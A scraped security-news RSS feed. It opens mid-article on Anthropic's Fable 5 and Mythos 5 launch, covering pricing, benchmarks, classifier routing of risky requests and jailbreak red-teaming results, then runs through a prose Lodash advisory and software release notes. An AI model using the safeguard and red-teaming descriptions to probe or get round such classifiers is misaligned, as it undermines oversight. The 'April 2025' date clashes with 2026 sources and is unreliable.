href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Qwen3.7-Plus</p></td><td><p>$0.40</p></td><td><p>$1.60</p></td><td><p>$2.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-plus&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi MiMo</a></p></td></tr><tr><td><p>Grok 4.3 (low context)</p></td><td><p>$1.25</p></td><td><p>$2.50</p></td><td><p>$3.75</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>GLM-5</p></td><td><p>$1.00</p></td><td><p>$3.20</p></td><td><p>$4.20</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>Kimi-K2.6</p></td><td><p>$0.95</p></td><td><p>$4.00</p></td><td><p>$4.95</p></td><td><p><a href="https://platform.kimi.ai/docs/pricing/chat-k26">Moonshot/Kimi</a></p></td></tr><tr><td><p>GLM-5.1</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>Grok 4.3 (high context)</p></td><td><p>$2.50</p></td><td><p>$5.00</p></td><td><p>$7.50</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>Qwen3.7-Max</p></td><td><p>$2.50</p></td><td><p>$7.50</p></td><td><p>$10.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?spm=a2ty_o05.31384571.0.0.52649f6b7G0D55&amp;tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-max&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>Gemini 3.5 Flash</p></td><td><p>$1.50</p></td><td><p>$9.00</p></td><td><p>$10.50</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (≤200K)</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (&gt;200K)</p></td><td><p>$4.00</p></td><td><p>$18.00</p></td><td><p>$22.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Claude Opus 4.8</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p><b>Claude Fable 5 / Claude Mythos 5</b></p></td><td><p><b>$10.00</b></p></td><td><p><b>$50.00</b></p></td><td><p><b>$60.00</b></p></td><td><p><b></b><a href="https://platform.claude.com/docs/en/about-claude/models/overview"><b>Anthropic</b></a></p></td></tr></tbody></table><p>For developers, Fable 5 is available through the Claude API as <code>claude-fable-5</code>. Anthropic says Fable 5 is fully available today on the Claude API and on consumption-based Enterprise plans.</p><p>For subscription users, the rollout is more complicated. Anthropic says Fable 5 will be included on Pro, Max, Team and seat-based Enterprise plans at no extra cost from today through June 22. </p><p>On June 23, the company plans to remove Fable 5 from those plans, after which using it will require usage credits. Anthropic says it aims to restore Fable 5 as a standard part of subscription plans as quickly as possible.</p><h2><b>The difference between Fable 5 and Mythos 5</b></h2><p>Anthropic is not presenting Fable 5 and Mythos 5 as two separate models in the usual “small versus large” sense. Instead, they appear to share the same base capability level. The difference is access <i>control — </i>that is, how easily it will be for users to get their hands on the models, and the guardrails embedded in each.</p><p>As previously mentioned Fable 5 includes a new safeguard layer that detects certain high-risk requests — including cybersecurity, biology and chemistry, and attempts to distill the model’s capabilities into other systems — and routes those requests to Claude Opus 4.8. </p><p>Mythos 5 lifts some of those restrictions for trusted users working in approved domains.</p><p>In practical terms, Mythos 5 is more powerful for sensitive cyber and biology work because it can answer in areas where Fable 5 falls back. </p><p>For most ordinary enterprise and developer tasks, however, Anthropic says Fable 5 performs effectively the same as Mythos 5.</p><p>The launch also signals how Anthropic plans to bring frontier models with dangerous dual-use capabilities into the market: not by releasing all capabilities to everyone, and not by simply refusing risky questions, but by routing some requests to a less capable model while keeping the stronger model available for the majority of everyday work.</p><h2><b>A major improvement in autonomous coding</b></h2><p>For enterprise buyers, the most immediate use case is likely software engineering. Anthropic says Fable 5 can work unattended for longer and with more independence than previous Claude models, which is exactly the capability enterprises need if they want AI agents to do more than autocomplete code or answer developer questions.</p><p>On <b>SWE-bench Pro, which measures a model's ability to complete difficult software engineering tasks, Anthropic says Fable 5 and Mythos 5 reach 80.3%</b>, vastly outperforming OpenAI's latest and greatest general model GPT-5.5, which scored 58.6%. </p><p>On Cognition’s FrontierCode Diamond benchmark, which tests high-quality, maintainable agentic coding, the models score 29.3%, compared with 13.4% for Claude Opus 4.8 and 5.7% for GPT-5.5, according to the benchmark table included in Anthropic’s materials. </p><p>Anthropic also says Fable 5 scores highest among frontier models on FrontierCode even at medium reasoning effort, suggesting the model may deliver stronger coding results without always needing maximum compute.</p><p>The most striking customer example comes from Stripe. Anthropic says Stripe tested Fable 5 in a 50-million-line Ruby codebase and found that the model completed a codebase-wide migration in one day that otherwise would have taken a team more than two months by hand. Stripe said, “Fable 5 compresses months of engineering into days. In our 50-million-line Ruby codebase, it did in a day what would've taken us more than two months by hand.”</p><p>Other early users describe the model as especially useful for long-horizon development tasks. Cursor said, “Fable 5 is the state of the art model on CursorBench. It's opened up a class of long-horizon problems that were out of reach for earlier models.” Replit said Fable 5 is the highest-performing model it has tested on ViBench, its end-to-end “vibe-coding” benchmark, and that it builds apps in less time with fewer tokens. Figma said Fable 5 is “a clear step forward on agentic coding and prototyping.”</p><p>This is the enterprise shift Anthropic is trying to sell: AI coding systems that can take on larger units of work, not just individual tickets. That could include codebase migrations, app prototyping, pull request review, test generation, debugging across unfamiliar tools, user interface design and multi-step internal software projects.</p><p>Base44 said, “Fable 5 is much deeper and better at one-shotting full apps, and its tool calling is excellent.” Genspark said, “Fable 5 came out #1 on our evals, winning head-to-head against every model we tested. It was significantly stronger on the hardest tasks in the set — UI design and game coding.” Rakuten said, “At the highest effort, Fable 5 reflects on and validates its own work. For us, that's what makes highly autonomous operations possible — the extra thinking pays for itself.”</p><p>For CTOs and engineering leaders, that suggests the model’s value may come less from raw code generation and more from sustained execution: understanding an intent, planning steps, calling tools, checking its own work and continuing through a task without constant human steering.</p><h2><b>Knowledge work, finance, legal and operations</b></h2><p>Anthropic is also positioning Fable 5 as a stronger model for enterprise knowledge work. On GDPval-AA, Anthropic reports a score of 1932 for Fable 5 and Mythos 5, compared with 1890 for Claude Opus 4.8, 1769 for GPT-5.5 and 1314 for Gemini 3.1 Pro. </p><p>On GDPpdf, a benchmark focused on visual document reasoning, Fable 5 and Mythos 5 score 29.8% without tools, compared with 22.5% for Opus 4.8, 24.9% for GPT-5.5 and 16.7% for Gemini 3.1 Pro.</p><p>That matters for enterprises because much of corporate work still lives in messy documents: PDFs, spreadsheets, charts, reports, contracts, filings, slide decks and screenshots. Anthropic says Fable 5 shows gains in document-based reasoning, chart and table interpretation and complex problem solving.</p><p>Hex said, “Fable 5 is the first to break 90% on our core analytics benchmark of complex, long-running analytical tasks — a 10-point jump over Opus. On the hardest questions, it shows strong judgment and attention to nuance.” Hebbia said Fable 5 was the highest-scoring model on its Finance Benchmark for senior-level reasoning, with double-digit gains in document reasoning, chart and table interpretation, and problem solving.</p><p>The finance examples are notable because they point to AI agents moving beyond summarization into higher-stakes analytical workflows. </p><p>IMC said Fable 5 “aced our trading-analysis evaluations nearly across the board: factual lookup, conceptual reasoning, root-cause analysis, expected-value analysis.” Optiver said the model was stronger than Opus 4.8 on its trading benchmark and “remarkably consistent,” scoring identically across repeated runs. Balyasny Asset Management said Fable 5 was the strongest finance-first model it had tested.</p><p>Legal and operations teams may also see immediate impact. Crosby Legal said, “Fable 5 feels materially different. In blind review, our lawyers found its redlines matched or beat our current model every time.” Notion said the model can take work “you'd chip away at all afternoon” and turn messy notes into a functioning project plan. Zapier said Fable 5 is the new leader on AutomationBench and is more autonomous than Opus 4.8: “Where Opus stops to ask, Fable 5 keeps looking.”</p><p>For enterprise software vendors, that points toward more capable embedded agents in workflow products: agents that can review a contract, update a project plan, assemble a spreadsheet, inspect a chart, file a ticket, run a query, call an internal API and keep going until the work is complete.</p><h2><b>Vision and interface understanding</b></h2><p>Anthropic says Fable 5 is also its strongest vision model. In its launch materials, the company says the model can extract precise numbers from detailed scientific figures and complete vision-based tasks such as rebuilding a web app’s source code from screenshots alone.</p><p>That has immediate implications for enterprise automation. Many business processes still depend on visual interfaces that are not cleanly exposed through APIs: dashboards, PDFs, forms, legacy apps, screenshots, scans and image-heavy reports. A stronger vision model could help agents operate across those environments with less custom integration work.</p><p>Anthropic also says Fable 5 needs less scaffolding than previous Claude models. As an example, the company says earlier Claude models struggled to play Pokémon FireRed even with extra tools, while <a href="https://youtu.be/CIQBP1w4B1M?si=QCoJ9amBEVMqoTUl">Fable 5 impressively beat the game using a minimal vision-only harness. </a>Anthropic posted a fast forwarded video of its playthrough to YouTube and in its blog post:</p><div></div><p>The point is not gaming itself, but the broader agentic skill: reading a visual environment, remembering progress, deciding what to do next and executing over a long horizon.</p><p>In another internal test, Anthropic says it had the model play the deck-building game Slay the Spire with access to persistent file-based memory. The company says persistent memory improved Fable 5’s performance three times more than it improved Opus 4.8’s, and that Fable reached the game’s final act three times more often. For enterprise users, this suggests Fable 5 may make better use of notes, logs and stored context during multi-step work.</p><p>That could matter for internal agents that operate over days or weeks: sales operations agents that track account research, engineering agents that manage migrations, finance agents that update models, or support agents that remember what they tried across many turns.</p><h2><b>From restricted cyber model to general-purpose enterprise AI</b></h2><p>The announcement follows Anthropic’s April 2025 rollout of Claude Mythos Preview through <a href="https://venturebeat.com/technology/anthropic-says-its-most-powerful-ai-cyber-model-is-too-dangerous-to-release">Project Glasswing</a>, a restricted program for cyber defenders, critical infrastructure providers and major software maintainers. Anthropic created Glasswing after internal evaluations showed Mythos-class models could find and exploit software vulnerabilities at a level that raised meaningful misuse concerns.</p><p>Following the debut of Glasswing and Mythos, <a href="https://www.nextgov.com/cybersecurity/2026/04/anthropics-glasswing-initiative-raises-questions-us-cyber-operations/412721/">U.S. officials and intelligence agencies began weighing</a> how such models could reshape both cyber defense and offensive operations, while Sen. Mark Warner warned that AI-assisted vulnerability discovery should force industry to “accelerate and reprioritize patching.” Financial regulators also took notice: <a href="https://www.theguardian.com/technology/2026/apr/22/what-is-anthropic-mythos-ai-threat-global-cybersecurity">The Guardian reported</a> that Mythos entered discussions among senior banking officials and regulators in the U.S. and U.K. because of fears that AI-accelerated cyberattacks could threaten payment systems and broader financial stability.</p><p>The reaction has not been limited to alarm. Governments also want access: <a href="https://www.reuters.com/legal/litigation/south-korea-secures-access-anthropics-mythos-ai-model-science-ministry-says-2026-06-03/">Reuters reported</a> that South Korea’s national internet security agency had secured Mythos access through Project Glasswing, reflecting a broader geopolitical race to use frontier AI for national cyber defense. At the same time, Anthropic has faced scrutiny over whether it can safely gate the very capabilities it says are too risky for general release. <a href="https://www.theverge.com/ai-artificial-intelligence/917644/anthropic-claude-mythos-breach-humiliation">The Verge reported</a> that unauthorized users accessed Mythos after its limited rollout, calling the incident damaging for a company that has built its brand around responsible AI. </p><p>Critics have also questioned whether Anthropic’s warning-heavy framing risks becoming a form of market positioning, since it casts the company as both the source of the new capability and the gatekeeper deciding which governments, companies and researchers get to use it.</p><p>With Fable 5, Anthropic is leaning into its gatekeeper role, attempting to separate the general enterprise value of a Mythos-class model from the riskiest parts of its capability profile. The company says Fable 5 can handle software engineering, research, visual reasoning, document analysis and long-running agentic workflows, while classifiers block or reroute requests that could provide what Anthropic calls “uplift” to malicious actors.</p><p>Those classifiers cover three main areas. </p><ol><li><p>Cybersecurity, where Anthropic says Mythos-class models can discover and exploit vulnerabilities and perform broader “agentic hacking” tasks such as reconnaissance, discovery and lateral movement. </p></li><li><p>Biology and chemistry, where the company says the same reasoning that can help researchers design therapies could also help well-resourced malicious actors pursue dangerous biological work. </p></li><li><p>Model distillation, where Anthropic says users may try to extract Claude’s capabilities to train competing models, including models that could be released without similar safeguards.</p></li></ol><p>When Fable 5’s classifiers detect one of those categories, the response is automatically handled by Claude Opus 4.8. Anthropic says users will be told when this happens. That is a notable product decision: rather than declining those requests outright, Anthropic is trying to keep the user experience functional while reducing access to the most capable version of the model in sensitive areas.</p><p>Anthropic says it red-teamed the new classifier system internally and externally. The company says an internal bug bounty produced no universal jailbreaks after more than 1,000 hours of testing, and external red-teaming organizations also failed to find a universal jailbreak. One external partner found that Fable 5 complied with zero harmful single-turn cyber requests related to planning cyberattacks, exploit development or defense evasion, even when prompts used any of 30 public jailbreak techniques, according to Anthropic.</p><p>The company is still acknowledging tradeoffs. Anthropic says the safeguards are deliberately cautious and may sometimes trigger on benign requests. That could frustrate security professionals, biology researchers and advanced enterprise users whose legitimate work overlaps with the blocked categories. The company says it plans to reduce false positives over time.</p><h2><b>Mythos 5 and the restricted frontier</b></h2><p>While Fable 5 is the broad commercial launch, Mythos 5 is the model to watch for enterprises operating in security, critical infrastructure and life sciences.</p><p>The company says all users with Claude Mythos Preview access can upgrade to Mythos 5 beginning today. It plans to expand access through a trusted access program, in collaboration with the U.S. government.</p><p>The distinction is important for sectors where the blocked capabilities are not edge cases but core workflows. A security team may need to reproduce vulnerabilities, test exploitability, analyze lateral movement or simulate attacker behavior in a controlled environment. A biology research team may need to reason through molecular design workflows that would trigger general-use safeguards. Fable 5 is not designed to give every user unrestricted access to those capabilities; Mythos 5 is designed for vetted users who need them.</p><p>Anthropic says Mythos 5 has the strongest cybersecurity capabilities of any model in the world. In the company’s benchmark table, the model family scores 78.0% on ExploitBench, compared with 69.0% for Claude Mythos Preview, 40.0% for Opus 4.8 and 34.0% for GPT-5.5. On CyberGym, Anthropic’s chart shows Mythos 5 at 83.8%, slightly ahead of Mythos Preview at 83.1% and far above Opus 4.8 with default safeguards.</p><p>The company is making a similar argument in biology. Anthropic says Mythos-class models outperform dedicated protein language models on a task involving adeno-associated viruses, a delivery mechanism used in gene therapies. The company frames that as both promising and risky: the same capability that could help gene therapy research could also be misused in dangerous biological work.</p><p>Anthropic says its internal protein design experts used Mythos 5 to accelerate parts of the drug design process by about tenfold. In one example, the company says Mythos 5, using protein design and bioinformatics tools without human assistance, matched or beat skilled human operators by choosing binding sites, selecting and running tools, and recovering from failures. Anthropic says nine of 14 protein targets in the study produced strong candidates for drug design that it is now investigating.</p><p>The company also says Mythos 5 produced novel molecular biology hypotheses that Anthropic scientists preferred over Opus-class model hypotheses about 80% of the time in blinded comparisons. Anthropic says several of those ideas have advanced to experimental evaluation, and one hypothesis involving an E. coli protein was later corroborated by an independent lab working on the same problem.</p><p>Those claims are potentially significant, but they should be treated carefully until more details are published. Anthropic says it intends to publish additional results in the coming months. For now, the strongest enterprise implication is directional: the company believes its highest-end models can already perform parts of scientific research workflows with less human intervention than prior systems.</p><h2><b>New, longer data retention requirement</b></h2><p>The company also introduced a new data-retention policy for Mythos-class models. Anthropic says it will require 30-day retention for all traffic on Fable 5, Mythos 5 and future models with similar or higher capability levels, across both first-party and third-party surfaces. The company says it will not use that data to train new Claude models or for non-safety purposes, and says it has added privacy protections including logging human access and deleting the data after 30 days in almost all cases.</p><p>That policy may become one of the most important enterprise buying questions around Fable 5. Many businesses want frontier AI capability but also want strict control over data retention, especially in regulated sectors. Anthropic’s position is that stronger monitoring is necessary for models with this level of capability. Enterprise customers will have to decide whether the capability gain justifies the retention requirement.</p><h2><b>Enterprise implications</b></h2><p>The broader enterprise significance of Fable 5 is that Anthropic is trying to commercialize a more autonomous class of AI model without exposing all of its capabilities to every user. That could become a template for how frontier labs release increasingly powerful systems: one model family, multiple access tiers, and domain-specific restrictions depending on user trust and risk.</p><p>If Fable 5 performs as Anthropic and early customers describe, developers may hand off larger tasks: code migrations, refactors, UI builds, test writing, bug fixing, documentation, internal tooling and multi-step app creation. </p><p>For knowledge-work-heavy enterprises, Fable 5 could make AI more useful in workflows where earlier models were too brittle: finance research, spreadsheet analysis, legal redlines, procurement review, board materials, market research, sales operations and project planning. The main gain is not just better answers; it is fewer turns, fewer corrections and more ability to keep working through ambiguity.</p><p>For security teams, the launch is more complicated. Most organizations will get Fable 5, not unrestricted Mythos 5. That means they may see stronger general coding and analysis, but not full access to the cyber capabilities Anthropic considers risky. Trusted defenders inside Project Glasswing will get Mythos 5, giving them a more direct way to use the model for vulnerability discovery and defensive testing.</p><p>For life sciences companies, the pattern is similar. Fable 5 may help with general research, literature analysis, data interpretation and scientific reasoning, but the more sensitive biological capabilities will be restricted. Anthropic is effectively creating a separate access path for vetted researchers whose work requires capabilities that could be dangerous in the wrong hands.</p><p>The launch also raises competitive pressure across the AI industry. Anthropic is claiming state-of-the-art results across agentic coding, knowledge work, vision, cybersecurity, legal reasoning, spatial reasoning and health benchmarks. But the more strategically important claim may be that it has found a workable release mechanism for models above its Opus class. If Fable 5’s safeguards hold up under real-world use, Anthropic will argue it can bring more powerful models to market sooner without fully opening the riskiest capabilities.</p><p>That is still a large “if.” The enterprise market will test not only Fable 5’s benchmark performance, but also its reliability, false-positive rate, data-retention tradeoffs and cost at scale. A model that can complete more work autonomously can also burn more tokens, trigger more governance questions and create new review burdens for teams that must verify its output.</p><p>Still, today’s launch marks a clear shift in the Claude lineup. Opus is no longer Anthropic’s top commercial capability tier. Mythos-class models now sit above it. Fable 5 is the first version of that tier for general users; Mythos 5 is the restricted version for trusted high-risk work. Together, they show how Anthropic plans to push frontier AI deeper into enterprise workflows while trying to keep the most dangerous capabilities gated.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8411-1: Lodash vulnerabilities]]></title>
<description><![CDATA[It was discovered that Lodash was vulnerable to a prototype pollution
issue in the zipObjectDeep function. An attacker could possibly use this
issue to modify application behavior. This issue only affected Ubuntu
18.04 LTS and Ubuntu 20.04 LTS. (CVE-2020-8203)

Liyuan Chen discovered that Lodash ...]]></description>
<link>https://tsecurity.de/de/3585488/unix-server/usn-8411-1-lodash-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585488/unix-server/usn-8411-1-lodash-vulnerabilities/</guid>
<pubDate>Tue, 09 Jun 2026 20:01:05 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that Lodash was vulnerable to a prototype pollution
issue in the zipObjectDeep function. An attacker could possibly use this
issue to modify application behavior. This issue only affected Ubuntu
18.04 LTS and Ubuntu 20.04 LTS. (CVE-2020-8203)

Liyuan Chen discovered that Lodash was vulnerable to a regular
expression denial of service issue in the toNumber, trim, and trimEnd
functions. An attacker could possibly use this issue to consume
excessive system resources, resulting in a denial of service. This issue
only affected Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. (CVE-2020-28500)

Marc Hassan discovered that Lodash did not properly sanitize input to
the template function. An attacker could possibly use this issue to
inject and execute arbitrary commands. This issue only affected Ubuntu
16.04 LTS, Ubuntu 18.04 LTS, and Ubuntu 20.04 LTS. (CVE-2021-23337)

It was discovered that Lodash was vulnerable to a prototype pollution
issue in the unset and omit functions. An attacker could possibly use
this issue to delete properties from global prototypes, resulting in
security restrictions being bypassed. This issue only affected Ubuntu
18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 24.04 LTS, and
Ubuntu 25.10. (CVE-2025-13465)

It was discovered that Lodash was vulnerable to a prototype pollution
issue in the unset and omit functions. An attacker could possibly use
this issue to delete properties from built-in prototypes, resulting in
security restrictions being bypassed. This issue only affected Ubuntu
18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 24.04 LTS, Ubuntu
25.10, and Ubuntu 26.04 LTS. (CVE-2026-2950)

It was discovered that Lodash did not properly validate certain inputs
to the template function. An attacker could possibly use this issue to
inject malicious code during template processing, resulting in arbitrary
code execution. (CVE-2026-4800)]]></content:encoded>
</item>
<item>
<title><![CDATA[ciflow/torchtitan/186752: [Inductor] Host-side TMA descriptors for Blackwell mm templates]]></title>
<description><![CDATA[Add a {{tma_descriptor()}} Jinja hook that lets mm templates declare TMA descriptors declaratively. When config.triton.enable_host_side_tma is True, the hook registers the input's pointer arg in host_tma_descriptor_args so the launcher (from PR #185825) replaces it with a TensorDescriptor at laun...]]></description>
<link>https://tsecurity.de/de/3583297/downloads/ciflowtorchtitan186752-inductor-host-side-tma-descriptors-for-blackwell-mm-templates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583297/downloads/ciflowtorchtitan186752-inductor-host-side-tma-descriptors-for-blackwell-mm-templates/</guid>
<pubDate>Tue, 09 Jun 2026 03:46:27 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Add a <code>{{tma_descriptor()}}</code> Jinja hook that lets mm templates declare TMA descriptors declaratively. When <code>config.triton.enable_host_side_tma</code> is True, the hook registers the input's pointer arg in <code>host_tma_descriptor_args</code> so the launcher (from PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4564769337" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/185825" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/185825/hovercard" href="https://github.com/pytorch/pytorch/pull/185825">#185825</a>) replaces it with a <code>TensorDescriptor</code> at launch time. When False, the hook emits device-side <code>tl.make_tensor_descriptor()</code> code.</p>
<p>This builds on the pointwise host-side TMA infrastructure from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4564769337" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/185825" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/185825/hovercard" href="https://github.com/pytorch/pytorch/pull/185825">#185825</a> and extends it to the template codegen path in <code>select_algorithm.py</code>. The Blackwell warp-specialized persistent TMA template (<code>triton_blackwell_ws_persistent_tma_mm.py.jinja</code>) is updated to use the hook, eliminating the inline <code>tl.make_tensor_descriptor()</code> calls and supporting both host-side and device-side paths from a single template.</p>
<p>Key changes:</p>
<ul>
<li><code>config.py</code>: <code>enable_host_side_tma</code> flag</li>
<li><code>select_algorithm.py</code>: <code>tma_descriptor()</code> hook with <code>dim_order</code> support for transposed inputs, signature upgrade to <code>tensordesc&lt;&gt;</code> types, <code>host_tma_descriptor_args</code> export to <code>inductor_meta</code></li>
<li><code>template_heuristics/triton.py</code>: <code>HOST_SIDE_TMA</code> config in Blackwell mixin</li>
<li><code>mm.py</code>: renamed template to <code>blackwell_ws_persistent_tma</code> (agnostic to host/device)</li>
<li><code>static_triton_launcher.py</code>: <code>tensordesc&lt;&gt;</code> type fallback to dynamic launcher</li>
<li><code>codegen/triton.py</code>, <code>triton_heuristics.py</code>: support dict format in <code>host_tma_descriptor_args</code> for <code>dim_order</code></li>
</ul>
<p>Authored with Claude.</p>
<p>Test Plan:</p>
<p>Tested with tritonbench on B200 with <code>TRITON_USE_META_WS=1</code>:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="CUDA_VISIBLE_DEVICES=2 TORCHINDUCTOR_FORCE_DISABLE_CACHES=1 TRITON_USE_META_WS=1 TRITON_PRINT_AUTOTUNING=1 python run.py --op gemm --only aten_matmul,pt2_matmul_maxautotune_device_side_tma_only,pt2_matmul_maxautotune_host_side_tma_only --shapes 4096x4096x4096 --metrics tflops,latency,accuracy"><pre class="notranslate"><code>CUDA_VISIBLE_DEVICES=2 TORCHINDUCTOR_FORCE_DISABLE_CACHES=1 TRITON_USE_META_WS=1 TRITON_PRINT_AUTOTUNING=1 python run.py --op gemm --only aten_matmul,pt2_matmul_maxautotune_device_side_tma_only,pt2_matmul_maxautotune_host_side_tma_only --shapes 4096x4096x4096 --metrics tflops,latency,accuracy
</code></pre></div>
<p>Results (4096x4096x4096 bf16, B200):</p>
<ul>
<li>cuBLAS: 0.107ms</li>
<li>device-side TMA: 0.193ms, accuracy=1</li>
<li>host-side TMA: 0.192ms, accuracy=1</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[Hi, everyone! We've just released Chrome 149 (149.0.7827.102) for Android. It'll become available on Google Play over the next few days. This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us know...]]></description>
<link>https://tsecurity.de/de/3583203/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583203/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Tue, 09 Jun 2026 02:19:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi, everyone! We've just released <b>Chrome 149 (149.0.7827.102)</b> for Android. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. </p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.59..149.0.7827.102?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><div><br></div><div>Android releases contain the same security fixes as their corresponding<a href="https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop_0153744567.html"> Desktop releases</a> (Windows &amp; Mac: 149.0.7827.102/103, Linux: 149.0.7872.102) unless otherwise noted.</div><div><div><br></div><div><div>Harry Souders</div><div><a href="https://www.google.com/chrome/">Google Chrome</a></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.163.0]]></title>
<description><![CDATA[Improvements

resources/jsconfig: Remove deprecated baseUrl setting ff2903a @bep #14991 #14996
all: Adjust tests for deprecated link and image render hook settings ca68936 @jmooring
all: Run go fix ./... 781fabf @bep
pagesfromdata: Use relative path for content adapter template metrics 1d018ef @a...]]></description>
<link>https://tsecurity.de/de/3581800/downloads/v01630/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581800/downloads/v01630/</guid>
<pubDate>Mon, 08 Jun 2026 16:46:31 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Improvements</h2>
<ul>
<li>resources/jsconfig: Remove deprecated baseUrl setting <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/ff2903a9317ba45a65f9963f837c66cc6bce3c0e/hovercard" href="https://github.com/gohugoio/hugo/commit/ff2903a9317ba45a65f9963f837c66cc6bce3c0e"><tt>ff2903a</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4590563931" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14991" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14991/hovercard" href="https://github.com/gohugoio/hugo/issues/14991">#14991</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4591979030" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14996" data-hovercard-type="pull_request" data-hovercard-url="/gohugoio/hugo/pull/14996/hovercard" href="https://github.com/gohugoio/hugo/pull/14996">#14996</a></li>
<li>all: Adjust tests for deprecated link and image render hook settings <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/ca68936d61b4cf0c1d3a45f5d4eb0a564a3c78ef/hovercard" href="https://github.com/gohugoio/hugo/commit/ca68936d61b4cf0c1d3a45f5d4eb0a564a3c78ef"><tt>ca68936</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmooring/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmooring">@jmooring</a></li>
<li>all: Run go fix ./... <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/781fabf4e406aae6b888d4f9f68331e7f13e89aa/hovercard" href="https://github.com/gohugoio/hugo/commit/781fabf4e406aae6b888d4f9f68331e7f13e89aa"><tt>781fabf</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a></li>
